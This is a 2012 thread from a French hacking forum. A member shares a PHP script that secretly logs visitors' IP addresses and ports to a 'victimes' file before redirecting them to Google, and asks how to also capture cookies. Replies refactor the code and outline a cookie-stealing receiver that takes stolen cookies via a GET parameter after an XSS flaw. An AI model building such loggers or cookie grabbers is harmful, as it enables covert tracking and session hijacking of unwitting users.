• STATISTIQUES
  • Il y a eu un total de 0 membres et 29345 visiteurs sur le site dans les dernières 24h pour un total de 29 345 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Le top web
    Nous offrons une sélection la plus large possible de resources webmaster gratuites, hébergement gratuit...
    Webmaster
    [FR] Secuser
    Actualité de la sécurité informatique, fiches virus et hoax, alertes par email, antivirus gratui...
    Hacking
    [FR] Root-me
    Script: 5, Système: 20, Cracking: 16, Cryptanalyse: 17, Programmation: 8, Réaliste: 11, Réseau: 10, Stéganog...
    Challenges
    [FR] PHP France
    Pour tout savoir sur le PHP, en français. Vous trouverez des tutoriels, des exemples, des astuces, toute la do...
    Hacking
    [EN] Reddit
    Subreddit dédié à la sécurité informatique.
    Hacking
    [EN] Exploit-db
    Une base de données d'exploits triés par genre (GHDB, Remote, Local, Web, DOS, ShellCode) à ...
    Vulnérabilités
    [FR] Newbie Contest
    Crackme: 35, Cryptographie: 49, Hacking: 27, Javascript/Java: 17, Logique: 31, Programmation: 23, Stéganographie: 53
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
[Php] Script de récupération de données d'utilisateurs
08-04-2012, 23h39 (Modification du message : 19-11-2012, 18h54 par InstinctHack.)
Message : #1
Apache9 Hors ligne
Membre
*



Messages : 39
Sujets : 4
Points: 1
Inscription : Apr 2012
[Php] Script de récupération de données d'utilisateurs
Bonjour,

J'ai actuellement un script php qui récupère ip + port.

Code PHP :
<?php
$ip 
$_SERVER['REMOTE_ADDR'];
$port $_SERVER['REMOTE_PORT']; 
$jma date("d/m/Y"); 
$h date("H");
$min date("i");
$sec date("s"); 
$fp fopen("victimes-98978-78787-8787-54778-877545.txt""a"); 
fputs($fp"L'adresse ip et le port était : $ip:$port;
s'est connecté le 
$jma à $h:$min:$sec.
//
"
); 
fclose($fp);  
header('Location: http://www.google.fr/');
exit();
?>

Je voudrais donc l'amélioré, en récupérant les cookies, et si vous avez encore d'autre idée, n’hésitai pas. Smile
+1 (0) -1 (0) Répondre
08-04-2012, 23h52 (Modification du message : 08-04-2012, 23h54 par InstinctHack.)
Message : #2
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Aide php
Ton code fait mal aux yeux l'ami :p
Code PHP :
<?php
$fp 
fopen("victimes-98978-78787-8787-54778-877545.txt""a"); 
fputs($fp'L\'adresse ip et le port était : '.$_SERVER['REMOTE_ADDR'].':'.$_SERVER['REMOTE_PORT'].
's\'est connecté le '.date("d/m/Y").' à '.date("H:i:s"));
fclose($fp); 

N'est-ce pas déjà mieux ? Wink
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
08-04-2012, 23h56
Message : #3
Apache9 Hors ligne
Membre
*



Messages : 39
Sujets : 4
Points: 1
Inscription : Apr 2012
RE: Aide php
Pourquoi mal au yeux ?
+1 (0) -1 (0) Répondre
09-04-2012, 01h11
Message : #4
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Aide php
tu stocke les données dans des variables que tu n'utilise qu'une fois (encore ça ça passe)
mais tu utilise 3 fois la meme fonction =O alors qu'une seul suffit,
et l'utilisation des doubles quotes...
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
09-04-2012, 10h03
Message : #5
supersnail Hors ligne
Éleveur d'ornithorynques
*******



Messages : 1,609
Sujets : 71
Points: 465
Inscription : Jan 2012
RE: Aide php
Sinon pour récupérer les cookies, il faut exploiter une faille du type XSS sur le site visé (cf le tuto de CyberSee Wink).

Heureusement que tu peux pas récupérer les cookies de tous les sites avec une simple visite sur une page, le contraire serait inquiétant :>
Mon blog

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
+1 (0) -1 (0) Répondre
09-04-2012, 10h49 (Modification du message : 09-04-2012, 10h49 par Apache9.)
Message : #6
Apache9 Hors ligne
Membre
*



Messages : 39
Sujets : 4
Points: 1
Inscription : Apr 2012
RE: Aide php
@sonn oui c'est plus clair, mais pas retour a la ligne entre chaque ip Confused

@aaSSfxxx, Ah merci, car moi on m'avais parler de faire un "Backdoor Cookies" mais moi qui débute dans tout ça, je n'ai pas trop compris. Smile
+1 (0) -1 (0) Répondre
09-04-2012, 15h25
Message : #7
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Aide php
<br /> pour les ip.
sinon aaSSfxxx as raison CS as mis un tuto là-dessus Wink
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
09-04-2012, 18h07 (Modification du message : 09-04-2012, 18h10 par Zhyar.)
Message : #8
Zhyar Hors ligne
Membre actif
*



Messages : 164
Sujets : 5
Points: 15
Inscription : Jun 2011
RE: Aide php
@sonn <br /> c'est en HTML.
Là il enregistre ça dans un fichier txt donc il faut faire \r\n ou \n.
+1 (0) -1 (0) Répondre
09-04-2012, 19h16
Message : #9
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Aide php
Ah oui, merci Zhyar, faute d'inattention, désolé :p
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
10-04-2012, 10h22
Message : #10
Booster2ooo Hors ligne
Contributeur
*****



Messages : 165
Sujets : 14
Points: 63
Inscription : Aug 2011
RE: Aide php
@Zhyar & sonn > PHP_EOL Wink

@Apache9 > pour ta "backdoor cookie", il faut faire passer le cookie via une variable GET (donc dans l'url, par exemple cookiejar.php?cookie=<leCookieDuGars>
et récup via $_GET['cookie']

Enjoy
+1 (0) -1 (0) Répondre
10-04-2012, 14h13
Message : #11
Zhyar Hors ligne
Membre actif
*



Messages : 164
Sujets : 5
Points: 15
Inscription : Jun 2011
RE: Aide php
@Booster2ooo > Je connaissais même pas cette constante ! Merci Wink
+1 (0) -1 (0) Répondre
11-04-2012, 15h11
Message : #12
Apache9 Hors ligne
Membre
*



Messages : 39
Sujets : 4
Points: 1
Inscription : Apr 2012
RE: Aide php
@Zhyar oui car j'avais essayer \n et aucun résultats par contre j'ai pas test \r\n je vais test, merci. Smile

@Booster2ooo ah d'accord merci je vais test aussi. Big Grin
+1 (0) -1 (0) Répondre
12-04-2012, 21h34
Message : #13
AntoLeNice Hors ligne
Newbie
*



Messages : 13
Sujets : 1
Points: 0
Inscription : Jun 2011
RE: Aide php
Mais pourquoi tu voudrais récupérer les cookies d'un utilisateur ? Selon moi, y'a absolument rien de white hat qu'on peut faire avec les cookies d'un utilisateur.
+1 (0) -1 (0) Répondre
12-04-2012, 21h38
Message : #14
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Aide php
Tester le système, encore et toujours AntoLeNice Wink
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
28-06-2013, 13h14
Message : #15
LeuhVa Hors ligne
Membre
*



Messages : 35
Sujets : 3
Points: 2
Inscription : May 2013
RE: [Php] Script de récupération de données d'utilisateurs
D'ailleurs on peut 'optimiser' ce scrit avec d'autres variables d'environnement type : $_SERVER['HTTP_ACCEPT_LANGUAGE']
$_SERVER['HTTP_USER_AGENT'] ou même $_SERVER['REDIRECT_URL'] !
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  [Python] rot script ark 9 426 08-03-2015, 00h37
Dernier message: ark
  [BASH] Connaitre les utilisateurs avec un le nom suivant InFamouZz 8 413 27-01-2014, 15h39
Dernier message: notfound
  [Python] script de création de Makefile octarin 3 284 01-09-2013, 20h26
Dernier message: formollover
  [Python] Script de rangement Bourbon Kid 1 207 04-07-2013, 23h32
Dernier message: Edelwin
  [Php] Chiffrement de données Apache9 15 861 11-07-2012, 18h38
Dernier message: Booster2ooo
  |Php] Enregistrer l'ip des visiteurs dans une base de données Drku 4 398 01-03-2012, 12h19
Dernier message: InstinctHack
  [Python] Script de protection des fichiers XML de Filezilla Dobry 0 104 10-01-2012, 22h27
Dernier message: Dobry
  [php] Script ne fonctionnant pas shutdownfuri 1 149 03-06-2011, 04h03
Dernier message: CyberSee

Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut